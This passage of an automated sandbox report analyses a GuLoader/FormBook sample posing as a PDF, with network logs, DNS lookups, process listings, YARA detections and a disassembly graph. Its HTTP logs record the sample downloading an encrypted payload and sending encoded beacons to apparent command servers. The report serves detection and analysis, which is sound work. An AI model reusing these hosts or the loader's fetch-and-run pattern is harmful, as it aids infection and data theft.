                                                                Nov 25, 2024 07:09:06.247771025 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.247828960 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.249748945 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.249799967 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.249833107 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.250081062 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.251852036 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.251899958 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:10.492691994 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:10.493031979 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:34.908680916 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:46.931726933 CET4983980192.168.2.4195.110.124.133
                                                                Nov 25, 2024 07:09:47.051229954 CET8049839195.110.124.133192.168.2.4
                                                                Nov 25, 2024 07:09:47.051331043 CET4983980192.168.2.4195.110.124.133
                                                                Nov 25, 2024 07:09:47.064893961 CET4983980192.168.2.4195.110.124.133
                                                                Nov 25, 2024 07:09:47.184353113 CET8049839195.110.124.133192.168.2.4
                                                                Nov 25, 2024 07:09:48.404817104 CET8049839195.110.124.133192.168.2.4
                                                                Nov 25, 2024 07:09:48.405020952 CET8049839195.110.124.133192.168.2.4
                                                                Nov 25, 2024 07:09:48.405138969 CET4983980192.168.2.4195.110.124.133
                                                                Nov 25, 2024 07:09:48.408066988 CET4983980192.168.2.4195.110.124.133
                                                                Nov 25, 2024 07:09:48.527467012 CET8049839195.110.124.133192.168.2.4
                                                                Nov 25, 2024 07:10:03.924897909 CET4987580192.168.2.4104.21.95.160
                                                                Nov 25, 2024 07:10:04.044482946 CET8049875104.21.95.160192.168.2.4
                                                                Nov 25, 2024 07:10:04.044589043 CET4987580192.168.2.4104.21.95.160
                                                                Nov 25, 2024 07:10:04.062268019 CET4987580192.168.2.4104.21.95.160
                                                                Nov 25, 2024 07:10:04.181838036 CET8049875104.21.95.160192.168.2.4
                                                                Nov 25, 2024 07:10:05.322365046 CET8049875104.21.95.160192.168.2.4
                                                                Nov 25, 2024 07:10:05.322870016 CET8049875104.21.95.160192.168.2.4
                                                                Nov 25, 2024 07:10:05.322973013 CET4987580192.168.2.4104.21.95.160
                                                                Nov 25, 2024 07:10:05.947310925 CET4987580192.168.2.4104.21.95.160

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 25, 2024 07:09:03.209315062 CET5078153192.168.2.41.1.1.1
                                                                Nov 25, 2024 07:09:03.864625931 CET53507811.1.1.1192.168.2.4
                                                                Nov 25, 2024 07:09:46.140583992 CET6551253192.168.2.41.1.1.1
                                                                Nov 25, 2024 07:09:46.923949957 CET53655121.1.1.1192.168.2.4
                                                                Nov 25, 2024 07:10:03.450618982 CET5294453192.168.2.41.1.1.1
                                                                Nov 25, 2024 07:10:03.922358990 CET53529441.1.1.1192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 25, 2024 07:09:03.209315062 CET192.168.2.41.1.1.10x638bStandard query (0)enechado.ru.comA (IP address)IN (0x0001)false
                                                                Nov 25, 2024 07:09:46.140583992 CET192.168.2.41.1.1.10x7e3dStandard query (0)www.officinadelpasso.shopA (IP address)IN (0x0001)false
                                                                Nov 25, 2024 07:10:03.450618982 CET192.168.2.41.1.1.10x207aStandard query (0)www.vayui.topA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 25, 2024 07:09:03.864625931 CET1.1.1.1192.168.2.40x638bNo error (0)enechado.ru.com103.83.194.50A (IP address)IN (0x0001)false
                                                                Nov 25, 2024 07:09:46.923949957 CET1.1.1.1192.168.2.40x7e3dNo error (0)www.officinadelpasso.shopofficinadelpasso.shopCNAME (Canonical name)IN (0x0001)false
                                                                Nov 25, 2024 07:09:46.923949957 CET1.1.1.1192.168.2.40x7e3dNo error (0)officinadelpasso.shop195.110.124.133A (IP address)IN (0x0001)false
                                                                Nov 25, 2024 07:10:03.922358990 CET1.1.1.1192.168.2.40x207aNo error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                                Nov 25, 2024 07:10:03.922358990 CET1.1.1.1192.168.2.40x207aNo error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • enechado.ru.com
                                                                • www.officinadelpasso.shop
                                                                • www.vayui.top

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.449743103.83.194.50808088C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 25, 2024 07:09:04.002588987 CET166OUTGET /tk.bin HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: enechado.ru.com
                                                                Cache-Control: no-cache
                                                                Nov 25, 2024 07:09:05.328820944 CET1236INHTTP/1.1 200 OK
                                                                Date: Mon, 25 Nov 2024 06:09:05 GMT
                                                                Server: Apache
                                                                Last-Modified: Mon, 25 Nov 2024 02:40:55 GMT
                                                                Accept-Ranges: bytes
                                                                Content-Length: 289856
                                                                Content-Type: application/octet-stream
                                                                Data Raw: e5 f1 c3 36 10 09 7e 10 91 e9 81 8b 2c 6b f5 d8 8b 21 eb 5d d6 e0 5b a3 a3 1a ad ba ee 91 22 6c 7b b8 78 4e 9a 46 69 7d a4 cd 27 52 f6 ce d5 29 29 52 1f c8 43 0d 84 be b4 62 44 57 31 78 88 d0 ed d2 67 4f 25 ca 44 e9 85 d6 66 3a 7f f0 85 68 86 d9 62 e3 38 94 68 94 93 6b a4 42 38 27 01 e9 0b d9 de 62 10 2d 8d 2e a6 9a 50 76 07 68 5f 41 18 ff c1 5b 9d a6 4a d9 ab d0 db 71 fd 29 dc ae cf f1 ef ff 95 58 97 03 6c 1a d1 ea 3f 0c 57 51 aa b8 af 96 56 b2 5a 8a 84 73 0a b2 fc 65 96 c5 94 fa 01 0e 40 98 9c 6f a0 42 d6 a8 23 27 4c 6a e6 b1 da bf 4e e9 d5 94 d4 34 12 0a 52 ce 3d 5e d2 aa 1d a2 fa d8 98 61 a8 79 6c 64 46 fb fc 6a 86 85 d3 0b 91 dd d3 3f 30 31 a5 34 27 da 75 34 a5 28 cd 24 0b 15 ee fa 54 69 4f b8 a8 d9 37 bf 0a ef 84 98 1d 2b f7 f9 c7 a4 a7 45 81 ff d6 73 97 44 2d c4 82 a6 84 b1 c7 77 35 ee f2 d7 a8 8a 57 9e 76 2b f2 eb aa eb 5f 5b 28 43 ce 72 11 c7 88 60 5b a8 99 78 cd 74 eb 90 57 04 72 25 38 7a e8 0f c7 e8 17 c5 ee 4a 07 99 e8 c0 8c ea 72 36 88 f1 6d 21 7e 1d f2 2e ce 77 44 72 87 90 e0 4d 4c 3e [TRUNCATED]
                                                                Data Ascii: 6~,k!]["l{xNFi}'R))RCbDW1xgO%Df:hb8hkB8'b-.Pvh_A[Jq)Xl?WQVZse@oB#'LjN4R=^ayldFj?014'u4($TiO7+EsD-w5Wv+_[(Cr`[xtWr%8zJr6m!~.wDrML>Z",d!Ki313?>X="v/OfVoZ?<a_;(Y7inpQY)!o{GG-KJ<L+l?J>?hdO&nDr3"ajq(DuIo`o]4z%zdQO!eW1+n}wIb:amsyxelF^4`Sfk/!^Sd?i:n}yKE8;/!~VvH|@M_/2'@nQ=R`Szg}14{!O$sF%Ux@%MX<I&Bid*=i+}o}<Fq?N<6H8/v<y01uu5T^x%b5ioPBk%VT9Qt\[7/}]>gl,SY][v3kHJK@:7NO([k%P;Z%*zIv.G^\NLBeHj- [TRUNCATED]
                                                                Nov 25, 2024 07:09:05.328905106 CET224INData Raw: 55 71 14 85 f8 bd 54 fc e2 5b 6e 2e 97 f2 cb 78 ed 1d a9 ad e9 d4 ea a6 63 33 82 8e f6 b2 bb 0d 4d 7b ab cc aa ac 52 34 e1 71 85 ac 9c 52 6b ec a7 65 ab a7 c4 f2 e9 1e 8c 0e 62 83 6a b1 4e 41 77 e1 e9 b1 05 e5 25 9a a7 0b 81 db b9 c7 04 ab bc 16
                                                                Data Ascii: UqT[n.xc3M{R4qRkebjNAw%8yw,p>Rqd3o\9zde8Oi'Qy'(M$Ci&s(8IU8;TKxGl$K*R|_Dz5W
                                                                Nov 25, 2024 07:09:05.328944921 CET1236INData Raw: c5 39 91 a2 89 8b 0e e3 dc 31 52 ae d3 15 de 79 96 8d d6 10 ad 02 aa 50 29 e5 1f b7 06 c5 68 a5 38 c0 5c 74 14 74 12 2d b1 04 ba 98 c8 0d 0c 65 eb 0d 74 54 95 34 4f 60 bd ba f2 03 4d d1 15 e8 59 a6 2d 65 94 1b 2a 8b 90 45 60 70 ca 84 79 91 64 bf
                                                                Data Ascii: 91RyP)h8\tt-etT4O`MY-e*E`pydp;*B|Y[5-sa$$P|G-r#2jaslsh/x}kC9JAhY U>yvqX;e-51)dXi,2%s+~,"_9J_
                                                                Nov 25, 2024 07:09:05.328957081 CET224INData Raw: 64 51 4f c6 c3 e1 97 fc bb 04 a2 21 8b 65 57 bf 31 2b 6e 7d 77 49 b6 15 62 3a 61 d4 ab a6 8d e7 c0 e7 6d 13 ac 97 1b ee f2 73 79 78 0b 65 6c 46 b8 de 5e b6 f5 34 84 e6 60 08 53 e1 66 6b 17 b2 9e f0 06 2f 9e 09 e9 b8 eb 21 97 8a 5e fc 53 cc cc da
                                                                Data Ascii: dQO!eW1+n}wIb:amsyxelF^4`Sfk/!^Sd?i:n}yKE8;/!~VvH|@M_/2'@nQ=R`Szg}14{!O$sF%Ux@%MX<I&Bid*=i
                                                                Nov 25, 2024 07:09:05.329082966 CET1236INData Raw: ca f1 ee 19 e4 d9 e5 93 2b 15 7d 96 6f fb 88 15 e5 9b 7d e7 01 3c ee 8b a7 96 c2 46 71 bd 3f 4e 98 3c ba ec 36 bc b1 06 48 38 b3 ef 2f 76 9d c6 3c 79 07 11 30 31 75 75 ac a4 35 05 9d 86 54 a9 89 f8 97 5e 78 25 18 62 c8 a4 35 ac 69 a9 6f 50 42 d6
                                                                Data Ascii: +}o}<Fq?N<6H8/v<y01uu5T^x%b5ioPBk%VT9Qt\[7/}]>gl,SY][v3kHJK@:7NO([k%P;Z%*zIv.G^\NLBeHj-WehQ
                                                                Nov 25, 2024 07:09:05.329094887 CET1236INData Raw: a4 42 38 27 01 e9 0b d9 de 62 10 2d 8d 2e a6 9a 50 76 07 68 5f 41 18 ff c1 5b 9d a6 4a d9 ab d0 db 71 45 29 dc ae c1 ee 55 f1 95 ec 9e ce 4d a2 d0 a6 f2 2d 03 39 c3 cb 8f e6 24 dd 3d f8 e5 1e 2a d1 9d 0b f8 aa e0 da 63 6b 60 ea e9 01 80 2b b8 88
                                                                Data Ascii: B8'b-.Pvh_A[JqE)UM-9$=*ck`+ghJ`4R=^{#{*f7u,PL+Esw5\}+_[(Cru[htv.-~qy"Cs&)+E
                                                                Nov 25, 2024 07:09:05.329106092 CET1236INData Raw: 4c 84 46 04 70 f9 8b 9c 27 19 3d a3 a1 80 63 a3 b3 be 9b bb e3 ab 34 29 6b a1 14 1a 87 59 9d 7f 6f 07 80 ad 7d 24 6f 80 bd b1 44 9a 08 b8 21 33 90 4d 45 7f 81 a0 e5 27 a7 93 c3 fd bc 2c 19 72 ba fc 1f d5 c0 c1 6c 66 ea 31 bb d5 a5 28 55 b6 e8 20
                                                                Data Ascii: LFp'=c4)kYo}$oD!3ME',rlf1(U {-\)2|?J0'g>[L@b#6\1S|aH{f+Q]44b;W%B)Gosphw'=/NY[,^45[DGfUBw)Cd"
                                                                Nov 25, 2024 07:09:05.329179049 CET1236INData Raw: 28 42 ef aa 55 4b b6 e3 50 0e 45 9f 94 ca 38 f8 ec 6a 53 79 91 a1 a1 79 0e 19 fc bf b9 c7 c4 fa 0f c0 21 95 55 7f 8a f6 ce 2d 8d cb 52 76 c3 88 3f ba 00 5b 8f 07 07 a0 a4 70 06 db e0 2a c6 b9 a2 34 fe e5 bf 7c eb 0d 29 c2 ad 08 3a 8b 79 9f 45 15
                                                                Data Ascii: (BUKPE8jSyy!U-Rv?[p*4|):yEAirITJqR`Xu?-6*mL#q_lW#iN)a[D32nQbvUR$*9Vt?2E?@CNnBfa<yL/`=]A$Titpb5TxPBU?VT
                                                                Nov 25, 2024 07:09:05.329191923 CET1236INData Raw: df 2e 64 3e 9b ec 6b 73 57 89 a6 4b 0a 46 05 f7 40 b7 58 62 d5 ba 25 f2 17 46 92 fe 0a f4 05 a9 f4 46 66 4e 8c 61 5d fa 0a c5 6b cd 8c 46 b3 a8 cd 1d 63 7e 0a 26 d1 d4 e1 60 90 71 f9 9b ce 59 35 5a d3 8b 12 98 94 af be 63 02 00 63 71 11 2e fb 31
                                                                Data Ascii: .d>ksWKF@Xb%FFfNa]kFc~&`qY5Zccq.12/XA-bj=(l_qRK>ARqx3Ckl:>b^g#jbF!U*1ZkqC*$J'W~0D!{`w/PW&tk#tm4%B
                                                                Nov 25, 2024 07:09:05.329202890 CET552INData Raw: 00 87 ee 36 5c 64 db 95 5a fa 31 91 47 d9 c4 ab 9c 6f 70 45 38 bc fd e7 b2 9d ce d6 08 58 57 aa 04 58 74 d5 34 98 79 52 c3 fa 3b de 55 d9 79 1c f0 87 f5 b8 65 42 f8 fc 1a ff 7a e8 ce ad 26 ac 33 55 63 2b 88 2c a1 c8 2a d8 fd 4e 23 49 c6 41 bb 41
                                                                Data Ascii: 6\dZ1GopE8XWXt4yR;UyeBz&3Uc+,*N#IAAc90Ss]ud/)a){$O;MXhQr3XA9{_o?gb2%>Np<;XQhv=Rlhd'MlXs?_CPGas-W
                                                                Nov 25, 2024 07:09:05.448561907 CET1236INData Raw: 1a 19 ab 04 70 c7 74 c4 c8 c7 36 90 96 95 d0 a9 4e c1 ab 0f 98 59 ee 41 3d 56 4f b1 69 df f7 7e dc fa 8e de 39 87 c4 8b d1 62 ce 52 61 ab 75 03 8e 3e 66 7d c0 b8 47 33 48 84 84 41 af 0c 38 71 dc d4 2f 82 68 34 b2 a5 56 85 f1 60 d5 84 84 65 b4 ba
                                                                Data Ascii: pt6NYA=VOi~9bRau>f}G3HA8q/h4V`e[JTL`I{|.mjTEws'a;yuXQ!d#,0$^'m[8T<`D?!j(X@9lm0Pj\T/Q


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.449839195.110.124.133803496C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 25, 2024 07:09:47.064893961 CET471OUTGET /vlg0/?s42t_Nbx=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&F0vD=qVTlJB1hk6Wd HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Host: www.officinadelpasso.shop
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                Nov 25, 2024 07:09:48.404817104 CET367INHTTP/1.1 404 Not Found
                                                                Date: Mon, 25 Nov 2024 06:09:48 GMT
                                                                Server: Apache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6c 67 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.449875104.21.95.160803496C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 25, 2024 07:10:04.062268019 CET712OUTPOST /4twy/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate
                                                                Accept-Language: en-us
                                                                Host: www.vayui.top
                                                                Origin: http://www.vayui.top
                                                                Referer: http://www.vayui.top/4twy/
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 205
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                Data Raw: 73 34 32 74 5f 4e 62 78 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 78 39 72 38 66 73 62 6d 7a 32 4f 38 69 4d 43 57 46 50 57 4d 78 43 6a 49 6e 6b 36 6d 67 66 6a 48 6c 72 69 50 6d 41 63 33 58 34 73 55 46 69 39 69 48 79 79 67 79 72 4f 45 48 2f 54 4f 58 43 45 4c 41 34 2b 2f 4f 64 58 46 48 64 49 39 6a 53 79 6f 45 79 35 38 62 35 77 75 31 54 57 6d 2f 45 71 53 37 49 4b 63 69 72 54 35 66 57 49 33 75 66 4a 47 4a 43 61 54 39 59 31 6e 68 73 35 6a 46 6f 51 57 34 65 6e 6e 68 62 63 7a 6f 4e 4f 37 78 69 64 6b 73 6e 4e 35 54 48 59 48 68 58 6d 30 4a 39 35 46 73 55 50 67 57 45 45 6d 71 6c 6d 4f 56 49 72 31 64 71 4d 43 32 51 3d 3d
                                                                Data Ascii: s42t_Nbx=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5THYHhXm0J95FsUPgWEEmqlmOVIr1dqMC2Q==
                                                                Nov 25, 2024 07:10:05.322365046 CET877INHTTP/1.1 404 Not Found
                                                                Date: Mon, 25 Nov 2024 06:10:05 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEwHlfkuX1XBoKn060kgOYQVkjIkdeCrBYmcS1n4baMNJm3QfEvFO4Yk3k3h8G8sxB4vf29TZj4c%2BmdukNc2eU5n87BwRj2KZtYO9XsDdgIdHL1c0MbRnJDb119sRSYA"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e7f793d6f090cae-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1493&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=712&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:01:07:57
                                                                Start date:25/11/2024
                                                                Path:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"
                                                                Imagebase:0x400000
                                                                File size:991'098 bytes
                                                                MD5 hash:F33B6E1067BF27D4BEA237206532881E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2279952126.0000000004C51000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:01:08:56
                                                                Start date:25/11/2024
                                                                Path:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"
                                                                Imagebase:0x400000
                                                                File size:991'098 bytes
                                                                MD5 hash:F33B6E1067BF27D4BEA237206532881E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:01:09:22
                                                                Start date:25/11/2024
                                                                Path:C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe"
                                                                Imagebase:0xee0000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:7
                                                                Start time:01:09:24
                                                                Start date:25/11/2024
                                                                Path:C:\Windows\SysWOW64\sdchange.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\sdchange.exe"
                                                                Imagebase:0xf80000
                                                                File size:40'960 bytes
                                                                MD5 hash:8E93B557363D8400A8B9F2D70AEB222B
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                General

                                                                Target ID:8
                                                                Start time:01:09:38
                                                                Start date:25/11/2024
                                                                Path:C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe"
                                                                Imagebase:0xee0000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:9
                                                                Start time:01:09:51
                                                                Start date:25/11/2024
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff6bf500000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:18.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:19.6%
                                                                  Total number of Nodes:1567
                                                                  Total number of Limit Nodes:35
                                                                  execution_graph 4149 401941 4150 401943 4149->4150 4155 402c41 4150->4155 4156 402c4d 4155->4156 4201 4062a6 4156->4201 4159 401948 4161 405996 4159->4161 4243 405c61 4161->4243 4164 4059d5 4167 405b00 4164->4167 4257 406284 lstrcpynW 4164->4257 4165 4059be DeleteFileW 4166 401951 4165->4166 4167->4166 4286 4065c7 FindFirstFileW 4167->4286 4169 4059fb 4170 405a01 lstrcatW 4169->4170 4171 405a0e 4169->4171 4172 405a14 4170->4172 4258 405ba5 lstrlenW 4171->4258 4175 405a24 lstrcatW 4172->4175 4176 405a1a 4172->4176 4178 405a2f lstrlenW FindFirstFileW 4175->4178 4176->4175 4176->4178 4180 405af5 4178->4180 4195 405a51 4178->4195 4179 405b1e 4289 405b59 lstrlenW CharPrevW 4179->4289 4180->4167 4183 40594e 5 API calls 4186 405b30 4183->4186 4185 405ad8 FindNextFileW 4187 405aee FindClose 4185->4187 4185->4195 4188 405b34 4186->4188 4189 405b4a 4186->4189 4187->4180 4188->4166 4192 4052ec 24 API calls 4188->4192 4191 4052ec 24 API calls 4189->4191 4191->4166 4194 405b41 4192->4194 4193 405996 60 API calls 4193->4195 4197 40604a 36 API calls 4194->4197 4195->4185 4195->4193 4196 4052ec 24 API calls 4195->4196 4262 406284 lstrcpynW 4195->4262 4263 40594e 4195->4263 4271 4052ec 4195->4271 4282 40604a MoveFileExW 4195->4282 4196->4185 4198 405b48 4197->4198 4198->4166 4209 4062b3 4201->4209 4202 4064fe 4203 402c6e 4202->4203 4234 406284 lstrcpynW 4202->4234 4203->4159 4218 406518 4203->4218 4205 4064cc lstrlenW 4205->4209 4207 4062a6 10 API calls 4207->4205 4209->4202 4209->4205 4209->4207 4211 4063e1 GetSystemDirectoryW 4209->4211 4212 4063f4 GetWindowsDirectoryW 4209->4212 4213 406518 5 API calls 4209->4213 4214 4062a6 10 API calls 4209->4214 4215 40646f lstrcatW 4209->4215 4216 406428 SHGetSpecialFolderLocation 4209->4216 4227 406152 4209->4227 4232 4061cb wsprintfW 4209->4232 4233 406284 lstrcpynW 4209->4233 4211->4209 4212->4209 4213->4209 4214->4209 4215->4209 4216->4209 4217 406440 SHGetPathFromIDListW CoTaskMemFree 4216->4217 4217->4209 4224 406525 4218->4224 4219 4065a0 CharPrevW 4222 40659b 4219->4222 4220 40658e CharNextW 4220->4222 4220->4224 4222->4219 4223 4065c1 4222->4223 4223->4159 4224->4220 4224->4222 4225 40657a CharNextW 4224->4225 4226 406589 CharNextW 4224->4226 4239 405b86 4224->4239 